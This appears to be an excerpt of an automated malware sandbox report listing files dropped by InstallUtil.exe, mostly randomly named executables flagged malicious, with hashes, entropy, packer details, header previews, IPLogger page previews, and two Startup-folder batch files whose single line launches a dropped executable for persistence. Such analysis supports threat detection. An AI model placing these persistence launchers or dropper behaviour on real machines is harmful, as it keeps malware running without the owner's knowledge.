                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684806772260995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:lnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHa:8WqlkLESgCRE/vhOjb05efd6e/oXHa
                                                                                                                                                                                                                                MD5:786132EEAAB5CA2D987FFAB04D074173
                                                                                                                                                                                                                                SHA1:8CCD0F737D5FE8FEC7B96E9E92C5BCBFC6484C20
                                                                                                                                                                                                                                SHA-256:530C85F2502C14D5140D958BD0515638AF1CB38C04C86FA4DEEAFE6BD8B97511
                                                                                                                                                                                                                                SHA-512:1982343FF26A4C24911CCAF905415597C8B6FC5115DB78807310C596695E163C4D58400CA0A93A9C8F94E02C2D5BEAFCCF347CBE6E4B15503117D16E7055E106
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....}.....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\wQY4uiHIT1Rmw3D6dX7Mml4K.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\wXxranKwriDbPr8wnfU8IA5G.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684771261859815
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:FnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHE:cWqlkLESgCRE/vhOjb05efd6e/oXHE
                                                                                                                                                                                                                                MD5:3C75E585255021AE084FD75240484292
                                                                                                                                                                                                                                SHA1:D15CE968C04EC6D6EA5DC0EBA56CF3B734E48649
                                                                                                                                                                                                                                SHA-256:45D15D98B8A5F60A5EE36967677E1A6554425C160A07584D9A1736FB7E9C5A3D
                                                                                                                                                                                                                                SHA-512:0E25CDD738C2A373C001B8EEA0A057952375269140AF931EEB9E60EA3847872B356B123B4F380055253DF550B13043B08052FB863B55485E3BFBBEA8A81168C9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......#....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\yjgJ9nt4OTDWzyoY4NSDLOwM.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\ynI9MlCoK2uCu7iRPFKyVbhb.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684810593398215
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:BnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHN:IWqlkLESgCRE/vhOjb05efd6e/oXHN
                                                                                                                                                                                                                                MD5:62C35A470D7DEB3AA4D433FB19C5E7F0
                                                                                                                                                                                                                                SHA1:E87FC235E15F027B34893EF41B2BDD6A4E0FD15D
                                                                                                                                                                                                                                SHA-256:19C92B60CEC2C7B8F506462524ABDDE7243D12A7E37A7D3DCB49BA0EE8F8D7BF
                                                                                                                                                                                                                                SHA-512:F32826BCF3ED95CDE1FBBD2321AABFAE497E3DE10071C915BDCD80B3F49FDA8553BA0846372D2A1F857F03C0194827B57FFCCADB38F861C8DF499BE8534BE7FA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....W.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\zILQneSJVLXUhxcgTc89dcSy.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684793872606654
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:3nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHi:CWqlkLESgCRE/vhOjb05efd6e/oXHi
                                                                                                                                                                                                                                MD5:B4CEF398C7001044330BE058549F9DE3
                                                                                                                                                                                                                                SHA1:9A5D2F59C06849BF7CF80A12E4FEF6FC1605234C
                                                                                                                                                                                                                                SHA-256:568F948A3289967E02C0524A5FEA70BE37B1208C1429B37CED3B316193345FDC
                                                                                                                                                                                                                                SHA-512:E6E27836E2D84DDC14B5DB7090C4C0CCA5FC4988FB3E9E47A27F9E52AD7B349E69E73EFF7B7DEB4472FEA6CF307820950CDE7FA69BB65801B6CFC71561B9F960
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\zON35BfDXHyPfdPSNEInc2BT.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\zpUboT49MR3eAuGylrU8kcsm.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.869626725541007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5dAkM0C/REln:fE1wkn2384
                                                                                                                                                                                                                                MD5:00542619821A482E2484D3F63C078D17
                                                                                                                                                                                                                                SHA1:2A0378ECBF2DE7FD26149A395D3D26D226497944
                                                                                                                                                                                                                                SHA-256:65CEFCC23B5ECED7C102705E50C0D4B8A743AAA66BA094644B2A8F943004D5F2
                                                                                                                                                                                                                                SHA-512:54DCE134CDE9C32E2C773802A6EA15F95F40982822123CCDDDAC9E2D4C8C743F286DE1C3BCDA30C4B6F9EF19BF7DFA84FFB63803F0CFBB73E6EB4044EAA68E40
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869604
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SYjPi2v:fE1wkn23Sfs
                                                                                                                                                                                                                                MD5:59F7C52A9F6027EA2F2531B2DB49B748
                                                                                                                                                                                                                                SHA1:25D87ACBC21AD5E4B1BF94360D937D6104729033
                                                                                                                                                                                                                                SHA-256:378034A7E5A738C086C8CEE9224630C79C563A193EC4EA545CEC03EC8C01A330
                                                                                                                                                                                                                                SHA-512:C885DC15D60E18D971C59AAA18B0C4BDBA0A2D5D20BB0433EE0D8ADCBDB8459774E3DEF25C71BEB2A865D87597D9A2D379D9DACCF64B2E72A5C3DB05F877B4EE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exe"

